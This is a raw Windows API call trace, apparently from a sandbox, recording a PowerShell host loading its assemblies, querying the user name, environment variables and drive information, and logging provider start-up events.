	[0355.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.285] CoTaskMemAlloc (cb=0x804) returned 0x1b7d0ad0
	[0355.285] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d0ad0, nSize=0x10d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d288) returned 0x1
	[0355.285] CoTaskMemFree (pv=0x1b7d0ad0) 
	[0355.285] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.285] GetUserNameW (in: lpBuffer=0x3576b0, pcbBuffer=0x10d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d2c8) returned 1
	[0355.286] CoTaskMemFree (pv=0x3576b0) 
	[0355.286] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3266e88*="Environment", lpRawData=0x3266c18) returned 1
	[0355.287] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0355.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.287] CoTaskMemFree (pv=0x1b7a8b00) 
	[0355.288] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0355.288] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0355.288] CoTaskMemFree (pv=0x1b7a8b00) 
	[0355.289] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0355.289] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0355.289] CoTaskMemFree (pv=0x1b7a8b00) 
	[0355.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0355.289] SetErrorMode (uMode=0x1) returned 0x1
	[0355.289] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x10d040 | out: lpFileInformation=0x10d040*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0355.289] SetErrorMode (uMode=0x1) returned 0x1
	[0355.291] GetLogicalDrives () returned 0x4
	[0355.291] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.292] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0355.292] SetErrorMode (uMode=0x1) returned 0x1
	[0355.293] CoTaskMemAlloc (cb=0x68) returned 0x3ccda0
	[0355.293] CoTaskMemAlloc (cb=0x68) returned 0x3cc9b0
	[0355.293] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3ccda0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x10d010, lpMaximumComponentLength=0x10d00c, lpFileSystemFlags=0x10d008, lpFileSystemNameBuffer=0x3cc9b0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10d010*=0x9c354b42, lpMaximumComponentLength=0x10d00c*=0xff, lpFileSystemFlags=0x10d008*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0355.294] CoTaskMemFree (pv=0x3ccda0) 
	[0355.294] CoTaskMemFree (pv=0x3cc9b0) 
	[0355.294] SetErrorMode (uMode=0x1) returned 0x1
	[0355.294] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0355.294] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.295] SetErrorMode (uMode=0x1) returned 0x1
	[0355.295] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10cfb0 | out: lpFileInformation=0x10cfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0355.295] SetErrorMode (uMode=0x1) returned 0x1
	[0355.295] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.295] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10cc00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.295] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0355.295] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10cb30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.295] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0355.296] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.296] SetErrorMode (uMode=0x1) returned 0x1
	[0355.296] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10cde0 | out: lpFileInformation=0x10cde0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0355.296] SetErrorMode (uMode=0x1) returned 0x1
	[0355.296] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.296] SetErrorMode (uMode=0x1) returned 0x1
	[0355.296] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10cde0 | out: lpFileInformation=0x10cde0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0355.296] SetErrorMode (uMode=0x1) returned 0x1
	[0355.297] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cc20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.297] SetErrorMode (uMode=0x1) returned 0x1
	[0355.297] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10ce80 | out: lpFileInformation=0x10ce80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0355.297] SetErrorMode (uMode=0x1) returned 0x1
	[0355.297] CoTaskMemAlloc (cb=0x804) returned 0x1b7d0ad0
	[0355.297] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d0ad0, nSize=0x10d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d288) returned 0x1
	[0355.298] CoTaskMemFree (pv=0x1b7d0ad0) 
	[0355.298] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.298] GetUserNameW (in: lpBuffer=0x3576b0, pcbBuffer=0x10d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d2c8) returned 1
	[0355.298] CoTaskMemFree (pv=0x3576b0) 
	[0355.298] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x326df78*="FileSystem", lpRawData=0x326dd08) returned 1
	[0355.299] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0355.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.299] CoTaskMemFree (pv=0x1b7a8b00) 
	[0355.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.300] CoTaskMemAlloc (cb=0x804) returned 0x1b7d0ad0
	[0355.300] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d0ad0, nSize=0x10d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d288) returned 0x1
	[0355.300] CoTaskMemFree (pv=0x1b7d0ad0) 
	[0355.300] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.300] GetUserNameW (in: lpBuffer=0x3576b0, pcbBuffer=0x10d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d2c8) returned 1
	[0355.300] CoTaskMemFree (pv=0x3576b0) 
	[0355.301] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32737b8*="Function", lpRawData=0x3273548) returned 1
	[0355.304] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0355.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.304] CoTaskMemFree (pv=0x1b7a8b00) 
	[0355.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.445] CoTaskMemAlloc (cb=0x804) returned 0x1b7d0ad0
	[0355.445] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d0ad0, nSize=0x10d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d288) returned 0x1
	[0355.573] CoTaskMemFree (pv=0x1b7d0ad0) 
	[0355.573] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.573] GetUserNameW (in: lpBuffer=0x3576b0, pcbBuffer=0x10d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d2c8) returned 1
	[0355.573] CoTaskMemFree (pv=0x3576b0) 
	[0355.574] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3295fe0*="Registry", lpRawData=0x3295d70) returned 1
	[0355.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.717] CoTaskMemAlloc (cb=0x804) returned 0x1b7d0ad0
	[0355.717] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d0ad0, nSize=0x10d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d288) returned 0x1
	[0355.717] CoTaskMemFree (pv=0x1b7d0ad0) 
	[0355.717] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.717] GetUserNameW (in: lpBuffer=0x3576b0, pcbBuffer=0x10d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d2c8) returned 1
	[0355.718] CoTaskMemFree (pv=0x3576b0) 
	[0355.718] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x329b3f8*="Variable", lpRawData=0x329b188) returned 1
	[0355.720] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0355.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.720] CoTaskMemFree (pv=0x1b7a8b00) 
	[0355.723] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0355.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.723] CoTaskMemFree (pv=0x1b7a8b00) 
	[0355.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0355.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0355.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0355.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0355.938] CoTaskMemAlloc (cb=0x804) returned 0x1b7dbd40
	[0355.938] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dbd40, nSize=0x10d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d288) returned 0x1
	[0355.938] CoTaskMemFree (pv=0x1b7dbd40) 
	[0355.938] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.938] GetUserNameW (in: lpBuffer=0x3576b0, pcbBuffer=0x10d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d2c8) returned 1
	[0355.938] CoTaskMemFree (pv=0x3576b0) 
	[0355.939] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32af010*="Certificate", lpRawData=0x32aeda0) returned 1
	[0356.065] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.065] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.069] GetLogicalDrives () returned 0x4
	[0356.069] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0356.069] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0356.070] CoTaskMemAlloc (cb=0x20e) returned 0x3a20f0
	[0356.070] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3a20f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0356.070] CoTaskMemFree (pv=0x3a20f0) 
	[0356.072] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.072] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.072] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.072] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.089] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.089] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.090] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.090] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.091] SetErrorMode (uMode=0x1) returned 0x1
	[0356.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10ced0 | out: lpFileInformation=0x10ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0356.091] SetErrorMode (uMode=0x1) returned 0x1
	[0356.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.091] SetErrorMode (uMode=0x1) returned 0x1
	[0356.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10ced0 | out: lpFileInformation=0x10ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0356.091] SetErrorMode (uMode=0x1) returned 0x1
	[0356.091] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.091] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.097] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0356.097] SetErrorMode (uMode=0x1) returned 0x1
	[0356.097] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10ce90 | out: lpFileInformation=0x10ce90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0356.097] SetErrorMode (uMode=0x1) returned 0x1
	[0356.097] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0356.097] SetErrorMode (uMode=0x1) returned 0x1
	[0356.097] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10ce90 | out: lpFileInformation=0x10ce90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0356.097] SetErrorMode (uMode=0x1) returned 0x1
	[0356.097] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
